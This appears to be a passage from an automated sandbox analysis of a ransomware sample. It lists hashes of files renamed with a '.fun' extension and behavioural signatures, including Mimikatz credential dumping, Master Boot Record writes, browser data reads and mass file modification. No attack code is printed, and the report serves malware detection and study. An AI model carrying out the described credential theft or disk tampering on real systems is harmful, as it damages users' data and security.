| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun
| MD5 | 829165ca0fd145de3c2c8051b321734f |
| SHA1 | f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e |
| SHA256 | a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356 |
| SHA512 | 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb |
C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun
| MD5 | f22599af9343cac74a6c5412104d748c |
| SHA1 | e2ac4c57fa38f9d99f3d38c2f6582b4334331df5 |
| SHA256 | 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65 |
| SHA512 | 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662143668243.txt.fun
| MD5 | 7887b5998e6e945cada0040b3675e122 |
| SHA1 | 70cae4fcb1b29370affbc7d3348f417e461371e0 |
| SHA256 | 2d3424af197d1c1af41137138c9069c73f29dbf0a7fe05bca984a6baa0560177 |
| SHA512 | cded9c10eeb2d678708a9d5e6b5ec2480ed1efc3949b11138498ec997f3cde92c44d538074ef6db1b128cc1d53ad5ea7456f75ddb36f3d730de12181cfdbf38d |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727663723895380.txt.fun
| MD5 | 9445a004b034d04ad52da34823263511 |
| SHA1 | c322862db0094359fb272d1c90d5158ea26a032a |
| SHA256 | a94334d04a574d8bb9427c7bab51e37b5d2dd7c8e8edde4ba746989c66acd891 |
| SHA512 | bfb9e07e12e04951deb52f452f2552bbf8be7993cf89544bbdeacbb55d333887e9452abc46cd8a42e10198d327e25aa29227c2c352790bcfb0263795366a2382 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727668321811013.txt.fun
| MD5 | dedc5834c706443bf68662061cc201bf |
| SHA1 | ef07bd5859fb285b9fa82ab09eec519348cd8556 |
| SHA256 | 50549eb84cca8a7b9f59240e97222ffe202f822e6d69fa7914f9bd8b1ba3a0bc |
| SHA512 | ff7214f5455dae290f543e65ca3da77e01d0aee816911be62c0cce465886e170628e170fa32fe65666b505bea514ef3f5bbf529aca20479ebefd103febf5f125 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727706484274390.txt.fun
| MD5 | d667a92c01f6eb2f07204f6fb3be13c7 |
| SHA1 | bfe7efc41e09cfc44f719659c3d10fecc3ad9fe9 |
| SHA256 | f463d025193cb1b5884413819c07cd49e651c46149649df779d72720a904b1d4 |
| SHA512 | e4e51c6f547164cf10dd6ce8570df953f4aa25d1e02b703722404e63c661d0a9f642b1b2bba87ddba0f2309f7dd48d0c168677b4e136b5f0adead8b51c2898b7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun
| MD5 | 75a585c1b60bd6c75d496d3b042738d5 |
| SHA1 | 02c310d7bf79b32a43acd367d031b6a88c7e95ed |
| SHA256 | 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834 |
| SHA512 | 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun
| MD5 | 880833ad1399589728c877f0ebf9dce0 |
| SHA1 | 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce |
| SHA256 | 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27 |
| SHA512 | 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun
| MD5 | 409a8070b50ad164eda5691adf5a2345 |
| SHA1 | e84e10471f3775d5d706a3b7e361100c9fbfaf74 |
| SHA256 | a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796 |
| SHA512 | 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.fun
| MD5 | 2884524604c89632ebbf595e1d905df9 |
| SHA1 | b6053c85110b0364766e18daab579ac048b36545 |
| SHA256 | ae2facd997527426fc4def82e0db68be29b44499bfff86a28c36f7c31b177d4f |
| SHA512 | 0b506397627823a1768796129c6b37d146821471b89338b5f2d0fd3aea707fd46a8e197ee0e298ddfb3b50eef0a0b064946006346b060f733ef19cbd5d24fc90 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun
| MD5 | e092d14d26938d98728ce4698ee49bc3 |
| SHA1 | 9f8ee037664b4871ec02ed6bba11a5317b9e784a |
| SHA256 | 5e8ec278a273be22199884d519a79f748801baa3a45b76e57569fdfffe96e7fb |
| SHA512 | b2fcb5d46339cdf6b5a954f2a083cf913779e57cb6e8699bc5da1fba1c370c41117b7ddefb50075622067eb7b02a20268bc047171bd883bcda4a497c2ec64ea4 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons.png.fun
| MD5 | 65368c6dd915332ad36d061e55d02d6f |
| SHA1 | fb4bc0862b192ad322fcb8215a33bd06c4077c6b |
| SHA256 | 6f9c7ebec5a707de439e3fd2e278fdfa07a39465d56157b70b24f091509bf76f |
| SHA512 | 8bb9a7690aeb3c0b9e14e1a6ebc5741536d354cf2324fd74ee0c3e4ef511718f7795039a94c8d2df94b6e6d0fb1762191cb649089d1def12abdf34003f0cdd0f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\example_icons2x.png.fun
| MD5 | 0d35b2591dc256d3575b38c748338021 |
| SHA1 | 313f42a267f483e16e9dd223202c6679f243f02d |
| SHA256 | 1ca0cfc2df0354c8d886285ae5e743d9c7cc030e1afd68ac113c0f2ce43ad5fa |
| SHA512 | f6c58c27bbde7508a866bd0e7fabadb13a4f020378cd8b8cfc0c9fa23f645d811d6cdea04b81afdf30c064c6248152e74b3e6a78ec7a3d1d19037a0db8897d7e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ui-strings.js.fun
| MD5 | 433755fcc2552446eb1345dd28c924eb |
| SHA1 | 23863f5257bdc268015f31ab22434728e5982019 |
| SHA256 | d6c290e942ee665d71e288229423a1f1866842988eac01f886910b0ec383aa9b |
| SHA512 | de83b580ce27012a7677e1da867c91e2a42dbc6b5872dcf756ace51c2862801814665ecca997171f2e550e8b9a3de19994d2516a4e5d4d57e16c7b4b823236c0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js.fun
| MD5 | 781ed8cdd7186821383d43d770d2e357 |
| SHA1 | 99638b49b4cfec881688b025467df9f6f15371e8 |
| SHA256 | a955039cd9e53674395f4b758218e4d59c89e99a0c4d2a909e49f6008b8f5dd4 |
| SHA512 | 87cb9c4288586df232200f7bbacee3dee04f31c9444902dd369ad5c392d71e9837ebf8b3bb0fcb4a5db8a879cf757e97ce248939e3316c6bf3a3fe7cbe579534 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons.png.fun
| MD5 | 72269cd78515bde3812a44fa4c1c028c |
| SHA1 | 87cada599a01acf0a43692f07a58f62f5d90d22c |
| SHA256 | 7c78b3da50c1135a9e1ecace9aea4ea7ac8622d2a87b952fc917c81010c953f7 |
| SHA512 | 3834b7a8866e8656bbdbf711fc400956e9b7a14e192758f26ccf31d8f6ab8e34f7b1983c1845dc84e45ff70555e423d54a475f6a668511d3bcbdd1d460eeb4b0 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_retina.png.fun
| MD5 | 7dbb12df8a1a7faae12a7df93b48a7aa |
| SHA1 | 07800ce598bee0825598ad6f5513e2ba60d56645 |
| SHA256 | aecde4eb94a19095495d76ef3189a9abd45bcfd41acbed7705d22b4c7d00aa77 |
| SHA512 | 96e454ebb4c96573e8edc6822290c22d425f4c7f7adbab35e6dc4b3ce04a5916ae9254c2c312c98299835ecbf3c5aa95da2939b8408ac25fbae44ba87a3795dc |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif.fun
| MD5 | eda4add7a17cc3d53920dd85d5987a5f |
| SHA1 | 863dcc28a16e16f66f607790807299b4578e6319 |
| SHA256 | 97f6348eaa48800e603d11fa22c62e10682ad919e7af2b2e59d6bd53937618f2 |
| SHA512 | d59fa9648dc7cb76a5163014f91b6d65d33aaa86fc9d9c73bf147943a3254b4c4f77f06b2e95bb8f94246a982ea466eb33dac9573dd62f40953fd23de1c1b498 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons.png.fun
| MD5 | 82a2e835674d50f1a9388aaf1b935002 |
| SHA1 | e09d0577da42a15ec1b71a887ff3e48cfbfeff1a |
| SHA256 | 904372666ca3c40f92b20317d92ca531678958affbc34591401e338146fe0ecb |
| SHA512 | b10a8e384d0bd088443a5085f5c22a296f6f4d295a053d4526690ba65846e887daec47d01cf18fdf1160db98061a8b7c4040de56e6e604451a821fadccf32698 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png.fun
| MD5 | 150c9a9ed69b12d54ada958fcdbb1d8a |
| SHA1 | 804c540a51a8d14c6019d3886ece68f32f1631d5 |
| SHA256 | 2dee41184747742fbdc527b2023d67fecec1ccdfdf258439a06cd75d4fd33f43 |
| SHA512 | 70193ee6f0919eb14311f43b5a5da041deacb568db55fc43290ee76e17af902ac468435b37a150630ea3b7871c724073915ae5dcba3c301ac42f2d68dd598e2f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.fun
| MD5 | ad091690b979144c795c59933373ea3f |
| SHA1 | 5d9e481bc96e6f53b6ff148b0da8417f63962ada |
| SHA256 | 7805ac9d0e05d560023e5aabed960d842e4f3ec2aa3db45a9cfb541688e2edb1 |
| SHA512 | 23b4c799a7b25f70962e8dd0ec7286ba7150053cab7c88f5fb1efc1095c2987bd6f3572e7fb3ee4b2238958e52a763de2c84a74615df7a6d3a19a034584fd687 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.fun
| MD5 | 2de4e157bf747db92c978efce8754951 |
| SHA1 | c8d31effbb9621aefac55cf3d4ecf8db5e77f53d |
| SHA256 | 341976b4fe312824d02512d74770a6df9e1c37123781655532bd9cd97ea65fa9 |
| SHA512 | 3042a742c38434ae3ee4fe10f7137462cdebad5cae0f9a85fb61063d15a30e1b54ac878b1af65f699c6ca1a9d2c3e58d245e54bdebfadc460cbd060836734e11 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.fun
| MD5 | be26a499465cfbb09a281f34012eada0 |
| SHA1 | b8544b9f569724a863e85209f81cd952acdea561 |
| SHA256 | 9095e9b4759e823e96984981af41b7a9915a5ecaa6be769f89c13484cef9e0f5 |
| SHA512 | 28196e5de9670e9f63adcf648368bd3ea5926a03e28a13adc2fb69c567fba2f84e4f162637c487acb64eda2e30993f849806f2313820ba693c7e70303542d04f |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.fun
| MD5 | 0c680b0b1e428ebc7bff87da2553d512 |
| SHA1 | f801dedfc3796d7ec52ee8ba85f26f24bbd2627c |
| SHA256 | 9433084e61062d2b709c1390e298ddaf3fb0226656662c04c0b7026a44dee750 |
| SHA512 | 2d1399a6bf225b048d2b12656e941ad912636acae2dec387f92f33ac80629a1e504bca63580ba73a8ed073788f697274d5eb76ea1b089f0555fd397a8f5cbbff |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_patterns_header.png.fun
| MD5 | 6e333be79ea4454e2ae4a0649edc420d |
| SHA1 | 95a545127e10daea20fd38b29dcc66029bd3b8bc |
| SHA256 | 112f72ef2bc57de697b82b731775fba3f518d1ae072120cd11b732bf4a782e36 |
| SHA512 | bed5906c7373814acc8a54c1631428a17f0aa69282920447a1575d8db826afd5dab262301dc6da610ff8bb81d24ec6babd3d9fb99fd6945f1aca9cb9c76ec2c9 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\bg_pattern_RHP.png.fun
| MD5 | b8454390c3402747f7c5e46c69bea782 |
| SHA1 | e922c30891ff05939441d839bfe8e71ad9805ec0 |
| SHA256 | 76f8ed1dd50e50c7d62b804a0d6901a93e5534787d7b38467933d4c12ce98a0d |
| SHA512 | 22b26c62473e80d17c1f78df14757ccfb6c7175faa541705edc153c02baa7ab0982b5daabe8dd2c8c9efb92af81f55ccaeeecffe8ed9a0b3c26e89135ca50923 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png.fun
| MD5 | 3ae8789eb89621255cfd5708f5658dea |
| SHA1 | 6c3b530412474f62b91fd4393b636012c29217df |
| SHA256 | 7c5b1d8469e232a58359ccbcb89e619c81c20e6d2c7579e4292eb9a19849bc5a |
| SHA512 | f6998dbae1a2fa56f962045261a11a50b8e03573d9d4cf39083da3be341cc104e0ecf5908076f03961bcdb1356d05a7450d69940ec3aaab73623a6fe180e7051 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png.fun
| MD5 | b7c62677ce78fbd3fb9c047665223fea |
| SHA1 | 3218c7b6fd8be5e0a8b67d3953d37d5dbd0c71d8 |
| SHA256 | aa638be6e1107ed1f14e8430abedd6f6d0a837a31b1b63e6a7741d6d417eddc2 |
| SHA512 | 9e0cc29835845f2a0260a6989c1b362bac22a8e0c2825bc18f1dde812ce7868503881d2deaf951429a80b5017b6ce31e785ff524883e08d730aa38b36a2fb074 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.fun
| MD5 | 117d6f863b5406cd4f2ac4ceaa4ba2c6 |
| SHA1 | 5cac25f217399ea050182d28b08301fd819f2b2e |
| SHA256 | 73acdc730d8a9ec8f340c724b4db96fc222bb1eaf836cec69dfe3fab8d6ac362 |
| SHA512 | e10883029c1e0fbc64bec9aac0a6957a8499af255e1790843717212077926474e02b2870c5dd04b057c956b97ad4bb1747fe73e731ea61b891f4b38dd80494d7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png.fun
| MD5 | 51da980061401d9a49494b58225b2753 |
| SHA1 | 3445ffbf33f012ff638c1435f0834db9858f16d3 |
| SHA256 | 3fb25ddd378ab756ec9faa56f16b76691cf6d9c7405bb9a09ce542a6f5b94e44 |
| SHA512 | ecc5eb2a045ce2508d461b999f16caba6cce55aa0c00b34bd73a33e0458795f93a77caff5026212912684164057be016f51dc57ec83821c2a1f2e27417c47b2c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png.fun
| MD5 | 2863e8df6fbbe35b81b590817dd42a04 |
| SHA1 | 562824deb05e2bfe1b57cd0abd3fc7fbec141b7c |
| SHA256 | 7f1238332901b740cde70db622abcfb533fc02f71e93101340073552f4820dad |
| SHA512 | 7b2d95465ea66951ea05c341549535a0a939d26dbde365b212e3983e4047fa6912c37d737cb8054c41bb1a7d92586d968a0154c666572a70ebc59a4776897f38 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png.fun
| MD5 | 79f6f006c95a4eb4141d6cedc7b2ebeb |
| SHA1 | 012ca3de08fb304f022f4ea9565ae465f53ab9e8 |
| SHA256 | e9847d0839d3cf1039bebdc49820ee7813d70941347ce420990592e5e3bd998e |
| SHA512 | c143a4cf1ccfa98039b73214978722408188535ee4aa3dac08a34760b94bdf6d36ad0ff0de893da5b17fd69c96a6dfb25098ab7fec219fad1a77532113d0353e |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small.png.fun
| MD5 | b88e3983f77632fa21f1d11ac7e27a64 |
| SHA1 | 03a2b008cc3fe914910b0250ed4d49bd6b021393 |
| SHA256 | 8469b8a64e80d662eec71c50513f6d295ef4a3a9992763dbcac9d81253cef9d5 |
| SHA512 | 5bf93d4f4250ca96169f3d27d4e648cc5d6e00b7558a3ef32e07edcbae36dadb8008d7ba5f83ac3ed812b72c9d52730e866191b4de7a339df57b5697e00df50d |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png.fun
| MD5 | f77086a1d20bca6ba75b8f2fef2f0247 |
| SHA1 | db7c58faaecd10e4b3473b74c1277603a75d6624 |
| SHA256 | cf10d2a22b638cf0978cf30ecaf39ecb5bb0e3ad78cd920afa433ad60cc1290d |
| SHA512 | a77a897c0b41f4052cb9546d4cfd6e0856b288b6b8583a86d6c7e79059a05b19cc2593599251581e79107235e9d5cd589c392bf490452be04ff57e944cd19df3 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png.fun
| MD5 | e03c9cd255f1d8d6c03b52fee7273894 |
| SHA1 | d0e9a9e6efd1746bc9ccb4eb8e7701c1cd707e2e |
| SHA256 | 22a34c8321384fc7682102e40d082e7812232a9109e4d4e8fa2152fda3f260f6 |
| SHA512 | d4bd002197b725316e1f1f2dd0a70ee44a82a53ac0dafa8c6b1166343adc406e147d0c4cca30d65a32aa545f1b327c6b69c0ec1d15330af48a6faa234dc4b5ac |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png.fun
| MD5 | 62b1443d82968878c773a1414de23c82 |
| SHA1 | 192bbf788c31bc7e6fe840c0ea113992a8d8621c |
| SHA256 | 4e96529c023168df8dde241a9acdbf4788ea65bc35605e18febff2b2071f1e24 |
| SHA512 | 75c8604ea65e0cdd9ea74b4802930444dd16a945da1e7f0af4a9a3762259ee9eb41ea96973555d06f4814ee2f6b73ab662c6b314b97876e9628fa5d4536e771c |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png.fun
| MD5 | bca915870ae4ad0d86fcaba08a10f1fa |
| SHA1 | 7531259f5edae780e684a25635292bf4b2bb1aac |
| SHA256 | d153ed6c5ea8c2c2f1839f8dadcc730f61bd8cd86ad732bab002a258dea1d037 |
| SHA512 | 03f23de6b0ae10e63c41e73308b3844d49379c55d2df75fa1dc00771b26253d832c21081d8289f04260369df996e31273b7c0788cf3b5c78a27ec909f14a283a |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js.fun
| MD5 | 14145467d1e7bd96f1ffe21e0ae79199 |
| SHA1 | 5db5fbd88779a088fd1c4319ff26beb284ad0ff3 |
| SHA256 | 7a75b8ec8809c460301f30e1960b13c518680792e5c743ce7e9a7f691cfafc38 |
| SHA512 | 762d499c54c5a25aba4357a50bb4e6b47451babeda84fa62cfbd649f8350bca55204ad002883b9147e78dda3dbabaae8da1dc94b716204226bb53326030772b7 |
memory/2700-3768-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-3769-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-3770-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-3773-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
memory/2700-3774-0x00007FFA103E0000-0x00007FFA10D81000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20241010-en
Max time kernel
103s
Max time network
19s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2580 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2580 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2580 wrote to memory of 2812 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2812 wrote to memory of 2816 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2812 wrote to memory of 2816 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2812 wrote to memory of 2816 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2812 wrote to memory of 2816 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | ab1cbe0449635193d9cfa104d39f09c6 |
| SHA1 | 467a53f8a081756def932a026743bbf544cc6dd9 |
| SHA256 | f49ce94f67824759eced661bb6ed2d46eedb7669821e570828ce7d59650cae77 |
| SHA512 | 81045e8ea0c6e44176efb9f7cd832d8be4ea790be1d042adc1cada8e14a3a538310bbc480def68118b7eeff3987f8ed7c1be29a117ca206acce594b5ca564f08 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Mimikatz
Mimikatz family
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ADE3.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\UnprotectConfirm.rar | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
